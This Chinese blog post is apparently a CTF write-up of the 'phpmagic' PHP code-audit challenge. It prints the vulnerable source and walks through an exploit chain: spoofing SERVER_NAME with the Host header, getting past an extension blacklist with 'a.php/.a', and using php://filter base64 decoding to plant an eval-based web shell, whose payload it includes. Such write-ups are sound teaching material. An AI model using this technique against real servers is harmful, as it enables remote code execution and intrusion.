一道代码审计题

最新推荐文章于 2023-06-04 23:04:49 发布
最新推荐文章于 2023-06-04 23:04:49 发布
阅读量537 收藏
点赞数
分类专栏: ctf_web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/silence1_/article/details/102845134
版权

一道代码审计题

题目是p神的code-breaking中的phpmagic。

先?read-source=1可以读到源码
php内容为:

<?php
if(isset($_GET['read-source'])) {
    exit(show_source(__FILE__));
}

define('DATA_DIR', dirname(__FILE__) . '/data/' . md5($_SERVER['REMOTE_ADDR']));

if(!is_dir(DATA_DIR)) {
    mkdir(DATA_DIR, 0755, true);
}
chdir(DATA_DIR);

$domain = isset($_POST['domain']) ? $_POST['domain'] : '';
$log_name = isset($_POST['log']) ? $_POST['log'] : date('-Y-m-d');
if(!empty($_POST) && $domain):
	$command = sprintf("dig -t A -q %s", escapeshellarg($domain));
	$output = shell_exec($command);
	$output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);

	$log_name = $_SERVER['SERVER_NAME'] . $log_name;
	if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
		file_put_contents($log_name, $output);
	}
	echo $output;
	endif; 
?>

分析源码,首先创建了一个文件夹
路径为./data/md5($_SERVER['REMOTE_ADDR'])/

$command = sprintf("dig -t A -q %s", escapeshellarg($domain));
$output = shell_exec($command);

这里使用shell_exec执行了命令,但输入的domain被escapeshellarg处理过,没有其他条件,难以利用。

escapeshellarg($string) 把字符串转码为可以在shell命令里使用的参数 (确保用户只传递一个参数给命令)

$log_name = $_SERVER['SERVER_NAME'] . $log_name;
if(!in_array(pathinfo($log_name, PATHINFO_EXTENSION), ['php', 'php3', 'php4', 'php5', 'phtml', 'pht'], true)) {
	file_put_contents($log_name, $output);
}
echo $output;

这里有写文件的操作,output被打印出来了的
在这里插入图片描述
这个命令会把我们传入的值输出出来,但在之前使用了htmlspecialchars这个函数,使得所有的标签都被转化了。

$output = htmlspecialchars($output, ENT_HTML401 | ENT_QUOTES);

我们可以使用php伪协议来写入文件,这样就不用担心标签字符失效了

这里还使用了pathinfo函数来取文件后缀,之后判断时候再黑名单中。
而pathinfo这个函数是可以被绕过的。

pathinfo函数只是取最后一个小数点之后的字符作为文件的后缀,因此很容易被绕过

这里用a.php/.a就能绕过,而且php://filter伪协议还能将其看做a.php
(详细可以看看:http://wonderkun.cc/index.html/?p=626)

我们要用php伪协议来写文件,所以文件名log_name一定是php://filter开头的。
log_name的赋值过程:

$log_name = isset($_POST['log']) ? $_POST['log'] : date('-Y-m-d');
$log_name = $_SERVER['SERVER_NAME'] . $log_name;

这里将log_name开头写成了$_SERVER[‘SERVER_NAME’]
查找资料,发现当我们使用ip访问的时候,$_SERVER[‘SERVER_NAME’]是可以伪造的。

到此,我们就可以构造payload了
<?php eval($_GET[1]); ?> base64==> PD9waHAgZXZhbCgkX0dFVFsxXSk7ICA/Pg==
因为我们输入的参数是在$output的中间部分,所以base64后的等号不能要,不然解base64时会出错
最后,
在这里插入图片描述

最后看上传的位置, ./data/md5($_SERVER['REMOTE_ADDR'])/
$_SERVER[‘REMOTE_ADDR’]是我们自己的ip地址
这里我的路径是 /data/dd546ac20717cd31b1ceaad3eb9911c1/
访问/data/dd546ac20717cd31b1ceaad3eb9911c1/shell.php,之后即可读取flag
在这里插入图片描述

知识点:

① php://filter可用来base64 bypass写入内容
② pathinfo可以用/.来绕过
③ $_SERVER[‘SERVER_NAME’]可通过Host进行伪造

Dar1in9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021-03-10-PHP代码审计
qq_50963064的博客
11-15 949
PHP代码审计 由于重点是代码审计,所以直接看代码了。 [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { //设置白名单 $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
代码审计资料整理——新手学习
10-13
适用于新手学习代码审计
代码审计 期末考试卷(一)
06-20
代码审计 期末考试卷(一)
代码审计
m0_64118193的博客
12-12 614
【代码】代码审计目。
记一次代码审计
weixin_34395205的博客
09-04 191
人生中的第一个代码审计目。虽然有点low,也没什么坑,但是它是我的第一次啊啊啊啊,第一次总是让人难以忘记,不是嘛?文章适合初学者,写的比较详细,笔者只是在这记录一下,并没有别的想法。 0x00 首先介绍一下目,目是把源码下载到本地分析的,其中的文件结构是以下截图这样的。看到目,咦,有sql文件,二话不说,那就先放到本机试试吧,于是把user.sql导入到本机数据库。然后一个一个看文件功...
代码审计练习
weixin_50597969的博客
04-08 632
代码审计练习源码方法 简单记录一下姿势 源码 <?php $var1 =$_GET['x']; $var2=$_GET['y']; if( (is_object($var1)&&is_object($var2)&&$var1 != $var2) && (md5($var1) === md5($var2)) && (sha1($var1) === sha1($var2)) ){ echo "you get it!"; } el
Seay源代码审计工具
08-10
Seay官方版是一款专业的Seay源代码审计工具。Seay源代码审计系统最新版支持一键自动审计、函数查询、代码高亮编辑器等功能,可以帮助用户随时审查源代码,及时发现问。通过Seay源代码审计系统用户可以自定义审计...
2019代码审计实战 ppt
最新发布
01-01
2019代码审计实战
Seay源代码审计.exe
12-16
Seay源代码审计.exe
Java代码审计案例及修复
12-22
Java 代码审计案例及修复 Java 代码审计是指对 Java 源代码进行安全审查和评估,以发现潜在的安全漏洞和风险。Java 代码审计案例及修复旨在提供一个 Java 代码审计的实践指南,涵盖了 Java 代码审计的基本概念、...
审计期末复习.doc
09-19
审计期末复习.doc
审计期末复习(1).doc
09-19
审计期末复习(1).doc
php代码审计目总结
qq_45927819的博客
12-14 1694
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page))//判断.
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 670
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
ctfshow 代码审计
akxnxbshai的博客
02-21 381
重新过一遍,写了个wp。
BugkuCTF之代码审计部分(未完待续。。。。)
A_dmin的博客
12-17 902
BugkuCTF之代码审计部分 第一: 分析代码: 首先确定extract()函数的用法,以及参数: 理解了extract()函数就好写了。 直接 ?shiyan=&amp;amp;amp;falg= 第二: 这个也是strcmp()函数的绕过,参数传入一个a数组 ?a[]=12 第三: 看代码,应该是让我们传入一个id=hackerDJ使之获取flag 不过又需要我们urldecode...
CTF练习——代码审计
HasntStartIsOver的博客
06-04 753
页面无返回值,也没有报错。说明通过了所有拦截,但是文件不存在或者是空白的。在source.php中展示了源代码,下面进行源码分析。源码中注释了source.php,直接访问该页面。一次尝试 payload =,最后获得flag。
CTF-Web-代码审计11
weixin_38131137的博客
07-04 1382
上一周新找的靶场里面的,最近太忙,花了快两周才做完,记录一下,免得做完忘记思路。 1、http://395115b6e98f1b6b21ee56eb5ef89614.synctf.com:8002/basic/base09/ 直接看到代码 可知道这个是文件包含?file=flag.txt 所以直接构造?file=flag.php 得到一段代码 可知这是一段加密代码,解密的话要用到decrypt,密钥有,相关要解密内容也有,直接写一段新的解密代码 编译得结果flag 2、http://3951..
PHP代码审计Day1-4练习
酉酉的博客
10-23 1317
文章目录Day1 in_array函数缺陷解payloadDay2 - filter_var函数缺陷解payloadDay3 实例化任意对象漏洞解payload1 来自先知社区-红日安全- Day1 in_array函数缺陷 链接 //1.php &lt;?php include 'config.php'; $conn = new mysqli($servername, $usernam...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值